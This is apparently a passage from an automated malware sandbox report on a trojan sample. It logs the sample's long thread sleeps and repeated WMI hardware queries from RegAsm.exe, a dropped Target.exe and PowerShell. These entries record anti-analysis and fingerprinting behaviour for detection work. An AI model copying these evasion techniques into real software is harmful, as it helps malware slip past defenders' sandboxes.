                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 180000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 1199187Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeThread delayed: delay time: 1198318Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6894Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2807Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 5067Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 4566Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 626Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe TID: 6300Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6812Thread sleep count: 6894 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6812Thread sleep count: 2807 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6996Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exe TID: 6712Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -420000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59859s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59733s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59624s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59515s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59404s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 1860Thread sleep time: -900000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59871s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59750s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59516s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59405s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -118594s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -1199187s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -119712s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -1198318s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -118970s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59373s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 6112Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59852s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59731s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59374s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59874s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59745s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59625s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59406s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59872s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59755s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59626s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59514s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59392s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -59267s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exe TID: 6708Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
